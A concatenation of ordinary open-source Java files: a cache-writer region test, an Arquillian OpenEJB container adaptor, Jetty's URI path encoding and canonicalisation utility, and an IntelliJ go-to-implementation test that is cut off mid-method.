this.destroyed = true;
}
};
AttributesFactory factory =
new AttributesFactory(getRegionAttributes());
factory.setCacheWriter(writer);
RegionAttributes attrs = factory.create();
Region region;
region = createRegion(name, attrs);
region.destroyRegion();
assertTrue(region.isDestroyed());
assertTrue(writer.wasInvoked());
region = createRegion(name, attrs);
region.destroyRegion(arg);
assertTrue(writer.wasInvoked());
assertTrue(region.isDestroyed());
try {
region = createRegion(name, attrs);
region.destroyRegion(exception);
fail("Should have thrown a CacheWriterException");
} catch (CacheWriterException ex) {
// pass...
assertTrue(writer.wasInvoked());
assertFalse(region.isDestroyed());
assertNull(region.getSubregion(name));
}
}
/**
* Tests that a <code>CacheWriter</code> is <I>not</I> invoked on a
* {@linkplain Region#localDestroyRegion local destroy}.
*/
public void testCacheWriterLocalDestroy() throws CacheException {
final String name = this.getUniqueName();
    // If any of the writer's callback methods are invoked during the local
    // destroy, this writer (which overrides nothing) will cause the test to fail.
    TestCacheWriter writer = new TestCacheWriter() { };
AttributesFactory factory =
new AttributesFactory(getRegionAttributes());
factory.setCacheWriter(writer);
RegionAttributes attrs = factory.create();
Region region = createRegion(name, attrs);
region.localDestroyRegion();
}
/**
* Tests that a {@link CacheWriter} throwing a {@link
* CacheWriterException} aborts the operation.
*/
public void testCacheWriterExceptionAborts() throws CacheException {
final String name = this.getUniqueName();
final String exception = "EXCEPTION";
TestCacheWriter writer = new TestCacheWriter() {
private void handleEvent(Object argument)
throws CacheWriterException {
if (exception.equals(argument)) {
String s = "Test Exception";
throw new CacheWriterException(s);
}
}
public void beforeCreate2(EntryEvent event)
throws CacheWriterException {
handleEvent(event.getCallbackArgument());
}
public void beforeUpdate2(EntryEvent event)
throws CacheWriterException {
handleEvent(event.getCallbackArgument());
}
public void beforeDestroy2(EntryEvent event)
throws CacheWriterException {
handleEvent(event.getCallbackArgument());
}
public void beforeRegionDestroy2(RegionEvent event)
throws CacheWriterException {
handleEvent(event.getCallbackArgument());
}
};
AttributesFactory factory =
new AttributesFactory(getRegionAttributes());
factory.setCacheWriter(writer);
RegionAttributes attrs = factory.create();
Region region;
region = createRegion(name, attrs);
Object value = new Integer(42);
String p1 = "Test Exception";
getCache().getLogger().info("<ExpectedException action=add>"
+ p1 + "</ExpectedException>");
try {
region.put(name, value, exception);
fail("Should have thrown a CacheWriterException");
} catch (CacheWriterException ex) {
assertNull(region.getEntry(name));
} finally {
getCache().getLogger().info("<ExpectedException action=remove>"
+ p1 + "</ExpectedException>");
}
region.put(name, value);
try {
region.put(name, "NEVER SEEN", exception);
fail("Should have thrown a CacheWriterException");
} catch (CacheWriterException ex) {
Region.Entry entry = region.getEntry(name);
assertNotNull(entry);
assertEquals(value, entry.getValue());
}
try {
region.destroy(name, exception);
fail("Should have thrown a CacheWriterException");
} catch (CacheWriterException ex) {
Region.Entry entry = region.getEntry(name);
assertNotNull(entry);
assertEquals(value, entry.getValue());
}
    try {
      region.destroyRegion(exception);
      fail("Should have thrown a CacheWriterException");
    } catch (CacheWriterException ex) {
      assertFalse(region.isDestroyed());
assertNotNull(region.getParentRegion().getSubregion(name));
}
}
}
|
|
/*
* JBoss, Home of Professional Open Source
* Copyright 2010, Red Hat Middleware LLC, and individual contributors
* by the @authors tag. See the copyright.txt in the distribution for a
* full listing of individual contributors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
* http://www.apache.org/licenses/LICENSE-2.0
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.jboss.arquillian.container.openejb.embedded_3_1;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.util.Properties;
import javax.naming.Context;
import javax.naming.InitialContext;
import org.apache.openejb.NoSuchApplicationException;
import org.apache.openejb.OpenEJB;
import org.apache.openejb.OpenEJBException;
import org.apache.openejb.UndeployException;
import org.apache.openejb.assembler.classic.AppInfo;
import org.apache.openejb.assembler.classic.Assembler;
import org.apache.openejb.client.LocalInitialContextFactory;
import org.apache.openejb.loader.SystemInstance;
import org.jboss.arquillian.spi.client.container.DeployableContainer;
import org.jboss.arquillian.spi.client.container.DeploymentException;
import org.jboss.arquillian.spi.client.container.LifecycleException;
import org.jboss.arquillian.spi.client.protocol.ProtocolDescription;
import org.jboss.arquillian.spi.client.protocol.metadata.ProtocolMetaData;
import org.jboss.arquillian.spi.core.InstanceProducer;
import org.jboss.arquillian.spi.core.annotation.ContainerScoped;
import org.jboss.arquillian.spi.core.annotation.DeploymentScoped;
import org.jboss.arquillian.spi.core.annotation.Inject;
import org.jboss.shrinkwrap.api.Archive;
import org.jboss.shrinkwrap.descriptor.api.Descriptor;
import org.jboss.shrinkwrap.openejb.config.ShrinkWrapConfigurationFactory;
/**
* Arquillian {@link DeployableContainer} adaptor
 * for a target OpenEJB environment; responsible
* for lifecycle and deployment operations
*
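 * <p>Illustrative client-side usage (a hypothetical sketch: {@code Greeter} and the
 * test names are assumptions; the annotations shown are the standard Arquillian,
 * ShrinkWrap and JUnit APIs):
 * <pre>
 * &#64;RunWith(Arquillian.class)
 * public class GreeterTest
 * {
 *    // Greeter is a hypothetical local session bean used only for illustration
 *    &#64;Deployment
 *    public static JavaArchive createDeployment()
 *    {
 *       return ShrinkWrap.create(JavaArchive.class).addClass(Greeter.class);
 *    }
 *
 *    &#64;EJB
 *    private Greeter greeter;
 *
 *    &#64;Test
 *    public void shouldGreet()
 *    {
 *       Assert.assertEquals("hello", greeter.greet());
 *    }
 * }
 * </pre>
 *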
* @author <a href="mailto:[email protected]">ALR</a>
* @version $Revision: $
*/
public class OpenEJBContainer implements DeployableContainer<OpenEJBConfiguration>
{
//-------------------------------------------------------------------------------------||
// Class Members ----------------------------------------------------------------------||
//-------------------------------------------------------------------------------------||
//-------------------------------------------------------------------------------------||
// Instance Members -------------------------------------------------------------------||
//-------------------------------------------------------------------------------------||
/**
* OpenEJB Assembler
*/
private Assembler assembler;
/**
* OpenEJB Configuration Factory for the Container
*/
private ShrinkWrapConfigurationFactory config;
/**
* OpenEJB Container configuration for Arquillian
*/
private OpenEJBConfiguration containerConfig;
/**
* The deployment
*/
@Inject @DeploymentScoped
private InstanceProducer<AppInfo> deployment;
/**
* The JNDI Context for this container.
*/
@Inject @ContainerScoped
private InstanceProducer<Context> jndiContext;
//-------------------------------------------------------------------------------------||
// Required Implementations -----------------------------------------------------------||
//-------------------------------------------------------------------------------------||
@Override
public ProtocolDescription getDefaultProtocol()
{
return new ProtocolDescription("Local");
}
@Override
public Class<OpenEJBConfiguration> getConfigurationClass()
{
return OpenEJBConfiguration.class;
}
@Override
public void setup(OpenEJBConfiguration configuration)
{
containerConfig = configuration;
}
/* (non-Javadoc)
* @see org.jboss.arquillian.spi.client.container.DeployableContainer#deploy(org.jboss.shrinkwrap.descriptor.api.Descriptor)
*/
@Override
public void deploy(Descriptor descriptor) throws DeploymentException
{
throw new UnsupportedOperationException("deploy Descriptor not supported");
}
/* (non-Javadoc)
* @see org.jboss.arquillian.spi.client.container.DeployableContainer#undeploy(org.jboss.shrinkwrap.descriptor.api.Descriptor)
*/
@Override
public void undeploy(Descriptor descriptor) throws DeploymentException
{
throw new UnsupportedOperationException("undeploy Descriptor not supported");
}
@Override
public ProtocolMetaData deploy(final Archive<?> archive) throws DeploymentException
{
// Deploy as an archive
final AppInfo appInfo;
try
{
appInfo = config.configureApplication(archive);
this.deployment.set(appInfo);
}
catch (final OpenEJBException e)
{
throw new DeploymentException("Could not configure application in OpenEJB", e);
}
try
{
assembler.createApplication(appInfo);
}
catch (final Exception ne)
{
throw new DeploymentException("Could not create the application", ne);
}
// Invoke locally
return new ProtocolMetaData();
}
@Override
public void start() throws LifecycleException
{
ShrinkWrapConfigurationFactory config = null;
OpenEJBAssembler assembler = null;
try
{
// Allow the OpenEJB startup code to run services required and configured
// by the user via external configuration resources.
OpenEJB.init(getInitialProperties());
assembler = (OpenEJBAssembler) SystemInstance.get().getComponent(Assembler.class);
config = (ShrinkWrapConfigurationFactory) assembler.getConfigurationFactory();
jndiContext.set(assembler.getContainerSystem().getJNDIContext());
}
catch (final Exception e)
{
throw new LifecycleException("Could not configure the OpenEJB Container", e);
}
      // Set the instance fields now that startup has succeeded
this.assembler = assembler;
this.config = config;
}
@Override
public void stop() throws LifecycleException
{
assembler.destroy();
}
@Override
public void undeploy(final Archive<?> archive) throws DeploymentException
{
String deploymentName = archive.getName();
// Undeploy the archive
try
{
         assembler.destroyApplication(deployment.get().jarPath);
}
catch (final UndeployException e)
{
throw new DeploymentException("Error in undeployment of " + deploymentName, e);
}
catch (final NoSuchApplicationException e)
{
throw new DeploymentException("Application was not deployed; cannot undeploy: " + deploymentName, e);
}
}
// Sets up properties for OpenEJB including those from a jndi.properties file
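   // For illustration only, a jndi.properties file referenced via the container's
   // "jndiProperties" setting could hold standard JNDI entries (example values):
   //
   //    java.naming.security.principal=openejb
   //    java.naming.security.credentials=openejb
   //
   // Anything loaded from that file is merged with the defaults set below.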
private Properties getInitialProperties() throws IOException
{
Properties properties = new Properties();
properties.put(InitialContext.INITIAL_CONTEXT_FACTORY, LocalInitialContextFactory.class.getName());
// Load properties from a jndi.properties file if it exists.
// OpenEJB would have done this if started via the InitialContext
if(containerConfig.getJndiProperties() != null)
{
File jndiPropertiesFile = new File(containerConfig.getJndiProperties());
if(jndiPropertiesFile.exists())
{
            InputStream jndiPropertiesStream = new FileInputStream(jndiPropertiesFile);
            try
            {
               properties.load(jndiPropertiesStream);
            }
            finally
            {
               jndiPropertiesStream.close();
            }
}
}
// configure OpenEJB to not deploy apps from the classpath
properties.put("openejb.deployments.classpath", "false");
// configure OpenEJB to use integration classes from Arquillian
properties.put("openejb.configurator", ShrinkWrapConfigurationFactory.class.getName());
properties.put("openejb.assembler", OpenEJBAssembler.class.getName());
if (containerConfig.getOpenEjbXml() != null)
{
properties.put("openejb.configuration", containerConfig.getOpenEjbXml());
}
return properties;
}
}
|
|
// ========================================================================
// Copyright (c) 2004-2009 Mort Bay Consulting Pty. Ltd.
// ------------------------------------------------------------------------
// All rights reserved. This program and the accompanying materials
// are made available under the terms of the Eclipse Public License v1.0
// and Apache License v2.0 which accompanies this distribution.
// The Eclipse Public License is available at
// http://www.eclipse.org/legal/epl-v10.html
// The Apache License v2.0 is available at
// http://www.opensource.org/licenses/apache2.0.php
// You may elect to redistribute this code under either of these licenses.
// ========================================================================
package org.eclipse.jetty.util;
import java.io.UnsupportedEncodingException;
import java.net.URI;
import java.net.URLEncoder;
import org.eclipse.jetty.util.log.Log;
/* ------------------------------------------------------------ */
/** URI Holder.
 * This class assists with the decoding and encoding of HTTP URIs.
* It differs from the java.net.URL class as it does not provide
* communications ability, but it does assist with query string
* formatting.
* <P>UTF-8 encoding is used by default for % encoded characters. This
* may be overridden with the org.eclipse.jetty.util.URI.charset system property.
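 * <p>Typical usage (illustrative only; the expected results follow from the rules
 * documented on the individual methods):
 * <pre>{@code
 * String encoded  = URIUtil.encodePath("/docs/My File.txt");      // "/docs/My%20File.txt"
 * String decoded  = URIUtil.decodePath(encoded);                  // "/docs/My File.txt"
 * String combined = URIUtil.addPaths("/docs/", "/My%20File.txt"); // "/docs/My%20File.txt"
 * }</pre>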
* @see UrlEncoded
*
*/
public class URIUtil
implements Cloneable
{
public static final String SLASH="/";
public static final String HTTP="http";
public static final String HTTP_COLON="http:";
public static final String HTTPS="https";
public static final String HTTPS_COLON="https:";
// Use UTF-8 as per http://www.w3.org/TR/html40/appendix/notes.html#non-ascii-chars
public static final String __CHARSET=System.getProperty("org.eclipse.jetty.util.URI.charset",StringUtil.__UTF8);
private URIUtil()
{}
/* ------------------------------------------------------------ */
/** Encode a URI path.
* This is the same encoding offered by URLEncoder, except that
* the '/' character is not encoded.
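     * <p>Example (illustrative):
     * <pre>{@code
     * URIUtil.encodePath("/foo bar/a?b"); // returns "/foo%20bar/a%3Fb"
     * URIUtil.encodePath("/plain/path");  // returned unchanged, no substitution needed
     * }</pre>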
     * @param path The path to encode
* @return The encoded path
*/
public static String encodePath(String path)
{
if (path==null || path.length()==0)
return path;
StringBuilder buf = encodePath(null,path);
return buf==null?path:buf.toString();
}
/* ------------------------------------------------------------ */
/** Encode a URI path.
     * @param buf StringBuilder to encode path into (or null)
     * @param path The path to encode
* @return The StringBuilder or null if no substitutions required.
*/
public static StringBuilder encodePath(StringBuilder buf, String path)
{
byte[] bytes=null;
if (buf==null)
{
loop:
for (int i=0;i<path.length();i++)
{
char c=path.charAt(i);
switch(c)
{
case '%':
case '?':
case ';':
case '#':
case '\'':
case '"':
case '<':
case '>':
case ' ':
buf=new StringBuilder(path.length()*2);
break loop;
default:
if (c>127)
{
try
{
bytes=path.getBytes(URIUtil.__CHARSET);
}
catch (UnsupportedEncodingException e)
{
throw new IllegalStateException(e);
}
buf=new StringBuilder(path.length()*2);
break loop;
}
}
}
if (buf==null)
return null;
}
synchronized(buf)
{
if (bytes!=null)
{
for (int i=0;i<bytes.length;i++)
{
byte c=bytes[i];
switch(c)
{
case '%':
buf.append("%25");
continue;
case '?':
buf.append("%3F");
continue;
case ';':
buf.append("%3B");
continue;
case '#':
buf.append("%23");
continue;
case '"':
buf.append("%22");
continue;
case '\'':
buf.append("%27");
continue;
case '<':
buf.append("%3C");
continue;
case '>':
buf.append("%3E");
continue;
case ' ':
buf.append("%20");
continue;
default:
if (c<0)
{
buf.append('%');
TypeUtil.toHex(c,buf);
}
else
buf.append((char)c);
continue;
}
}
}
else
{
for (int i=0;i<path.length();i++)
{
char c=path.charAt(i);
switch(c)
{
case '%':
buf.append("%25");
continue;
case '?':
buf.append("%3F");
continue;
case ';':
buf.append("%3B");
continue;
case '#':
buf.append("%23");
continue;
case '"':
buf.append("%22");
continue;
case '\'':
buf.append("%27");
continue;
case '<':
buf.append("%3C");
continue;
case '>':
buf.append("%3E");
continue;
case ' ':
buf.append("%20");
continue;
default:
buf.append(c);
continue;
}
}
}
}
return buf;
}
/* ------------------------------------------------------------ */
/** Encode a URI path.
     * @param buf StringBuilder to encode path into (or null)
     * @param path The string to encode
* @param encode String of characters to encode. % is always encoded.
* @return The StringBuilder or null if no substitutions required.
*/
public static StringBuilder encodeString(StringBuilder buf,
String path,
String encode)
{
if (buf==null)
{
loop:
for (int i=0;i<path.length();i++)
{
char c=path.charAt(i);
if (c=='%' || encode.indexOf(c)>=0)
{
buf=new StringBuilder(path.length()<<1);
break loop;
}
}
if (buf==null)
return null;
}
synchronized(buf)
{
for (int i=0;i<path.length();i++)
{
char c=path.charAt(i);
if (c=='%' || encode.indexOf(c)>=0)
{
buf.append('%');
StringUtil.append(buf,(byte)(0xff&c),16);
}
else
buf.append(c);
}
}
return buf;
}
/* ------------------------------------------------------------ */
/* Decode a URI path and strip parameters
     * @param path The encoded path, possibly with ';' parameters
     * @return The decoded path with any parameters stripped
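     * e.g. (illustrative) decodePath("/a%20b;jsessionid=123") returns "/a b":
     *      the %XX escapes are decoded and everything from the first ';' on is stripped.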
*/
public static String decodePath(String path)
{
if (path==null)
return null;
// Array to hold all converted characters
char[] chars=null;
int n=0;
// Array to hold a sequence of %encodings
byte[] bytes=null;
int b=0;
int len=path.length();
for (int i=0;i<len;i++)
{
char c = path.charAt(i);
if (c=='%' && (i+2)<len)
{
if (chars==null)
{
chars=new char[len];
bytes=new byte[len];
path.getChars(0,i,chars,0);
}
bytes[b++]=(byte)(0xff&TypeUtil.parseInt(path,i+1,2,16));
i+=2;
continue;
}
else if (c==';')
{
if (chars==null)
{
chars=new char[len];
path.getChars(0,i,chars,0);
n=i;
}
break;
}
else if (bytes==null)
{
n++;
continue;
}
// Do we have some bytes to convert?
if (b>0)
{
// convert series of bytes and add to chars
String s;
try
{
s=new String(bytes,0,b,__CHARSET);
}
catch (UnsupportedEncodingException e)
{
s=new String(bytes,0,b);
}
s.getChars(0,s.length(),chars,n);
n+=s.length();
b=0;
}
chars[n++]=c;
}
if (chars==null)
return path;
// if we have a remaining sequence of bytes
if (b>0)
{
// convert series of bytes and add to chars
String s;
try
{
s=new String(bytes,0,b,__CHARSET);
}
catch (UnsupportedEncodingException e)
{
s=new String(bytes,0,b);
}
s.getChars(0,s.length(),chars,n);
n+=s.length();
}
return new String(chars,0,n);
}
/* ------------------------------------------------------------ */
/* Decode a URI path and strip parameters.
     * @param buf Buffer holding the encoded path bytes
     * @param offset Offset of the path within the buffer
     * @param length Length of the encoded path in bytes
*/
public static String decodePath(byte[] buf, int offset, int length)
{
byte[] bytes=null;
int n=0;
for (int i=0;i<length;i++)
{
byte b = buf[i + offset];
if (b=='%' && (i+2)<length)
{
b=(byte)(0xff&TypeUtil.parseInt(buf,i+offset+1,2,16));
i+=2;
}
else if (b==';')
{
length=i;
break;
}
else if (bytes==null)
{
n++;
continue;
}
if (bytes==null)
{
bytes=new byte[length];
for (int j=0;j<n;j++)
bytes[j]=buf[j + offset];
}
bytes[n++]=b;
}
if (bytes==null)
return StringUtil.toString(buf,offset,length,__CHARSET);
return StringUtil.toString(bytes,0,n,__CHARSET);
}
/* ------------------------------------------------------------ */
/** Add two URI path segments.
* Handles null and empty paths, path and query params (eg ?a=b or
* ;JSESSIONID=xxx) and avoids duplicate '/'
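     * <p>Examples (illustrative):
     * <pre>{@code
     * URIUtil.addPaths("/ctx/", "/foo");   // "/ctx/foo"
     * URIUtil.addPaths("/ctx?a=b", "foo"); // "/ctx/foo?a=b"
     * }</pre>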
* @param p1 URI path segment (should be encoded)
* @param p2 URI path segment (should be encoded)
* @return Legally combined path segments.
*/
public static String addPaths(String p1, String p2)
{
if (p1==null || p1.length()==0)
{
if (p1!=null && p2==null)
return p1;
return p2;
}
if (p2==null || p2.length()==0)
return p1;
int split=p1.indexOf(';');
if (split<0)
split=p1.indexOf('?');
if (split==0)
return p2+p1;
if (split<0)
split=p1.length();
StringBuilder buf = new StringBuilder(p1.length()+p2.length()+2);
buf.append(p1);
if (buf.charAt(split-1)=='/')
{
if (p2.startsWith(URIUtil.SLASH))
{
buf.deleteCharAt(split-1);
buf.insert(split-1,p2);
}
else
buf.insert(split,p2);
}
else
{
if (p2.startsWith(URIUtil.SLASH))
buf.insert(split,p2);
else
{
buf.insert(split,'/');
buf.insert(split+1,p2);
}
}
return buf.toString();
}
/* ------------------------------------------------------------ */
/** Return the parent Path.
* Treat a URI like a directory path and return the parent directory.
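     * <p>Example (illustrative):
     * <pre>{@code
     * URIUtil.parentPath("/a/b/c"); // "/a/b/"
     * URIUtil.parentPath("/");      // null
     * }</pre>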
*/
public static String parentPath(String p)
{
if (p==null || URIUtil.SLASH.equals(p))
return null;
int slash=p.lastIndexOf('/',p.length()-2);
if (slash>=0)
return p.substring(0,slash+1);
return null;
}
/* ------------------------------------------------------------ */
    /** Convert a path to a canonical form.
* All instances of "." and ".." are factored out. Null is returned
* if the path tries to .. above its root.
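     * <p>Examples (illustrative):
     * <pre>{@code
     * URIUtil.canonicalPath("/a/./b/../c"); // "/a/c"
     * URIUtil.canonicalPath("/a/../..");    // null, tries to go above the root
     * }</pre>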
* @param path
* @return path or null.
*/
public static String canonicalPath(String path)
{
if (path==null || path.length()==0)
return path;
int end=path.length();
int start = path.lastIndexOf('/', end);
search:
while (end>0)
{
switch(end-start)
{
case 2: // possible single dot
if (path.charAt(start+1)!='.')
break;
break search;
case 3: // possible double dot
if (path.charAt(start+1)!='.' || path.charAt(start+2)!='.')
break;
break search;
}
end=start;
start=path.lastIndexOf('/',end-1);
}
// If we have checked the entire string
if (start>=end)
return path;
StringBuilder buf = new StringBuilder(path);
int delStart=-1;
int delEnd=-1;
int skip=0;
while (end>0)
{
switch(end-start)
{
case 2: // possible single dot
if (buf.charAt(start+1)!='.')
{
if (skip>0 && --skip==0)
{
delStart=start>=0?start:0;
if(delStart>0 && delEnd==buf.length() && buf.charAt(delEnd-1)=='.')
delStart++;
}
break;
}
if(start<0 && buf.length()>2 && buf.charAt(1)=='/' && buf.charAt(2)=='/')
break;
if(delEnd<0)
delEnd=end;
delStart=start;
if (delStart<0 || delStart==0&&buf.charAt(delStart)=='/')
{
delStart++;
if (delEnd<buf.length() && buf.charAt(delEnd)=='/')
delEnd++;
break;
}
if (end==buf.length())
delStart++;
end=start--;
while (start>=0 && buf.charAt(start)!='/')
start--;
continue;
case 3: // possible double dot
if (buf.charAt(start+1)!='.' || buf.charAt(start+2)!='.')
{
if (skip>0 && --skip==0)
{ delStart=start>=0?start:0;
if(delStart>0 && delEnd==buf.length() && buf.charAt(delEnd-1)=='.')
delStart++;
}
break;
}
delStart=start;
if (delEnd<0)
delEnd=end;
skip++;
end=start--;
while (start>=0 && buf.charAt(start)!='/')
start--;
continue;
default:
if (skip>0 && --skip==0)
{
delStart=start>=0?start:0;
if(delEnd==buf.length() && buf.charAt(delEnd-1)=='.')
delStart++;
}
}
// Do the delete
if (skip<=0 && delStart>=0 && delEnd>=delStart)
{
buf.delete(delStart,delEnd);
delStart=delEnd=-1;
if (skip>0)
delEnd=end;
}
end=start--;
while (start>=0 && buf.charAt(start)!='/')
start--;
}
// Too many ..
if (skip>0)
return null;
// Do the delete
if (delEnd>=0)
buf.delete(delStart,delEnd);
return buf.toString();
}
/* ------------------------------------------------------------ */
/** Convert a path to a compact form.
* All instances of "//" and "///" etc. are factored out to single "/"
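     * <p>Example (illustrative):
     * <pre>{@code
     * URIUtil.compactPath("//foo///bar");   // "/foo/bar"
     * URIUtil.compactPath("/foo?bar=a//b"); // unchanged, the query part is not compacted
     * }</pre>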
* @param path
* @return path
*/
public static String compactPath(String path)
{
if (path==null || path.length()==0)
return path;
int state=0;
int end=path.length();
int i=0;
loop:
while (i<end)
{
char c=path.charAt(i);
switch(c)
{
case '?':
return path;
case '/':
state++;
if (state==2)
break loop;
break;
default:
state=0;
}
i++;
}
if (state<2)
return path;
StringBuffer buf = new StringBuffer(path.length());
buf.append(path,0,i);
loop2:
while (i<end)
{
char c=path.charAt(i);
switch(c)
{
case '?':
buf.append(path,i,end);
break loop2;
case '/':
if (state++==0)
buf.append(c);
break;
default:
state=0;
buf.append(c);
}
i++;
}
return buf.toString();
}
/* ------------------------------------------------------------ */
/**
* @param uri URI
* @return True if the uri has a scheme
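     * <p>Examples (illustrative):
     * <pre>{@code
     * URIUtil.hasScheme("http://host/path"); // true
     * URIUtil.hasScheme("/relative/path");   // false
     * }</pre>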
*/
public static boolean hasScheme(String uri)
{
for (int i=0;i<uri.length();i++)
{
char c=uri.charAt(i);
if (c==':')
return true;
if (!(c>='a'&&c<='z' ||
c>='A'&&c<='Z' ||
(i>0 &&(c>='0'&&c<='9' ||
c=='.' ||
c=='+' ||
c=='-'))
))
break;
}
return false;
}
}
|
|
/*
* Copyright 2000-2016 JetBrains s.r.o.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.intellij.navigation;
import com.intellij.codeInsight.navigation.GotoTargetHandler;
import com.intellij.openapi.roots.ModuleRootModificationUtil;
import com.intellij.openapi.util.text.StringUtil;
import com.intellij.psi.PsiClass;
import com.intellij.psi.PsiElement;
import com.intellij.psi.PsiFile;
import com.intellij.psi.PsiMethod;
import com.intellij.testFramework.IdeaTestUtil;
import com.intellij.testFramework.PlatformTestUtil;
import com.intellij.testFramework.fixtures.CodeInsightTestUtil;
import com.intellij.testFramework.fixtures.JavaCodeInsightFixtureTestCase;
import java.util.Arrays;
public class GotoImplementationHandlerTest extends JavaCodeInsightFixtureTestCase {
public void testMultipleImplsFromAbstractCall() {
PsiFile file = myFixture.addFileToProject("Foo.java", "public abstract class Hello {\n" +
" abstract void foo();\n" +
"\n" +
" class A {\n" +
" {\n" +
" fo<caret>o();\n" +
" }\n" +
" }\n" +
" class Hello1 extends Hello {\n" +
" void foo() {}\n" +
" }\n" +
" class Hello2 extends Hello {\n" +
" void foo() {}\n" +
" }\n" +
"}");
myFixture.configureFromExistingVirtualFile(file.getVirtualFile());
final PsiElement[] impls = getTargets(file);
assertEquals(2, impls.length);
}
public void testFromIncompleteCode() {
PsiFile file = myFixture.addFileToProject("Foo.java", "public abstract class Hello {\n" +
" abstract void foo();\n" +
"\n" +
" class A {\n" +
" {\n" +
" Hello<caret>\n" +
" }\n" +
" }\n" +
" class Hello1 extends Hello {\n" +
" void foo() {}\n" +
" }\n" +
"}" +
"class Hello2 extends Hello {\n" +
" void foo() {}\n" +
"}\n");
myFixture.configureFromExistingVirtualFile(file.getVirtualFile());
final PsiElement[] impls = getTargets(file);
assertEquals(2, impls.length);
}
public void testToStringOnUnqualified() {
final PsiFile file = myFixture.addFileToProject("Foo.java", "public class Fix {\n" +
" {\n" +
" <caret>toString();\n" +
" }\n" +
"}\n" +
"class FixImpl1 extends Fix {\n" +
" @Override\n" +
" public String toString() {\n" +
" return \"Impl1\";\n" +
" }\n" +
"}\n" +
"class FixImpl2 extends Fix {\n" +
" @Override\n" +
" public String toString() {\n" +
" return \"Impl2\";\n" +
" }\n" +
"}");
myFixture.configureFromExistingVirtualFile(file.getVirtualFile());
PlatformTestUtil.startPerformanceTest(getTestName(false), 150, () -> {
PsiElement[] impls = getTargets(file);
assertEquals(3, impls.length);
}).cpuBound().usesAllCPUCores().assertTiming();
}
public void testToStringOnQualified() {
final PsiFile file = myFixture.addFileToProject("Foo.java", "public class Fix {\n" +
" {\n" +
" Fix ff = new FixImpl1();\n" +
" ff.<caret>toString();\n" +
" }\n" +
"}\n" +
"class FixImpl1 extends Fix {\n" +
" @Override\n" +
" public String toString() {\n" +
" return \"Impl1\";\n" +
" }\n" +
"}\n" +
"class FixImpl2 extends Fix {\n" +
" @Override\n" +
" public String toString() {\n" +
" return \"Impl2\";\n" +
" }\n" +
"}");
myFixture.configureFromExistingVirtualFile(file.getVirtualFile());
PlatformTestUtil.startPerformanceTest(getTestName(false), 150, () -> {
PsiElement[] impls = getTargets(file);
assertEquals(3, impls.length);
}).cpuBound().usesAllCPUCores().assertTiming();
}
public void testShowSelfNonAbstract() {
//fails if groovy plugin is enabled: org.jetbrains.plugins.groovy.codeInsight.JavaClsMethodElementEvaluator
PsiFile file = myFixture.addFileToProject("Foo.java", "public class Hello {\n" +
" void foo(){}\n" +
"\n" +
" class A {\n" +
" {\n" +
" fo<caret>o();\n" +
" }\n" +
" }\n" +
" class Hello1 extends Hello {\n" +
" void foo() {}\n" +
" }\n" +
" class Hello2 extends Hello {\n" +
" void foo() {}\n" +
" }\n" +
"}");
myFixture.configureFromExistingVirtualFile(file.getVirtualFile());
final PsiElement[] impls = getTargets(file);
assertEquals(3, impls.length);
}
public void testMultipleImplsFromStaticCall() {
PsiFile file = myFixture.addFileToProject("Foo.java", "public abstract class Hello {\n" +
" static void bar (){}\n" +
" class Hello1 extends Hello {\n" +
" }\n" +
" class Hello2 extends Hello {\n" +
" }\n" +
"class D {\n" +
" {\n" +
" He<caret>llo.bar();\n" +
" }\n" +
"}");
myFixture.configureFromExistingVirtualFile(file.getVirtualFile());
final PsiElement[] impls = getTargets(file);
assertEquals(2, impls.length);
}
public void testFilterOutImpossibleVariants() {
PsiFile file = myFixture.addFileToProject("Foo.java", "interface A {\n" +
" void save();\n" +
"}\n" +
"interface B extends A {\n" +
" void foo();\n" +
"}\n" +
"class X implements B {\n" +
" public void foo() { }\n" +
" public void save(){}\n" +
"}\n" +
"class Y implements A {\n" +
" public void save(){}\n" +
"}\n" +
"class App {\n" +
" private B b;\n" +
" private void some() {\n" +
" b.sa<caret>ve();\n" +
" }\n" +
"}");
myFixture.configureFromExistingVirtualFile(file.getVirtualFile());
final PsiElement[] impls = getTargets(file);
assertEquals(1, impls.length);
final PsiElement method = impls[0];
assertTrue(method instanceof PsiMethod);
final PsiClass aClass = ((PsiMethod)method).getContainingClass();
assertNotNull(aClass);
assertEquals("X", aClass.getName());
}
public void testImplicitInheritance() {
PsiFile file = myFixture.addFileToProject("Foo.java", "interface PackContainer {\n" +
" void foo();\n" +
"}\n" +
"interface PsiPackage extends PackContainer {}\n" +
"class PsiPackageBase implements PackContainer {\n" +
" public void foo() {}\n" +
"}\n" +
"class PsiPackageImpl extends PsiPackageBase implements PsiPackage {}\n" +
"\n" +
"class Foo {\n" +
" class Bar {\n" +
" void bar(PsiPackage i) {\n" +
" i.fo<caret>o();\n" +
" }\n" +
" }\n" +
"}");
myFixture.configureFromExistingVirtualFile(file.getVirtualFile());
final PsiElement[] impls = getTargets(file);
assertEquals(1, impls.length);
final PsiElement method = impls[0];
assertTrue(method instanceof PsiMethod);
final PsiClass aClass = ((PsiMethod)method).getContainingClass();
assertNotNull(aClass);
assertEquals("PsiPackageBase", aClass.getName());
}
public void testMethodReferences() {
PsiFile file = myFixture.addFileToProject("Foo.java", "interface I {void f();}\n" +
"class A implements I { public void f(){}}\n" +
"class B implements I { public void f(){}}\n" +
"class C {\n" +
" void foo(java.util.List<I> l) {l.stream().forEach(I::<caret>f);}" +
"}");
myFixture.configureFromExistingVirtualFile(file.getVirtualFile());
final PsiElement[] impls = getTargets(file);
assertEquals(2, impls.length);
    // target order is non-deterministic, so sort by containing class name
Arrays.sort(impls, (o1, o2) -> {
String name1 = ((PsiMethod)o1).getContainingClass().getName();
String name2 = ((PsiMethod)o2).getContainingClass().getName();
return StringUtil.compare(name1, name2, false);
});
final PsiElement method = impls[0];
assertTrue(method instanceof PsiMethod);
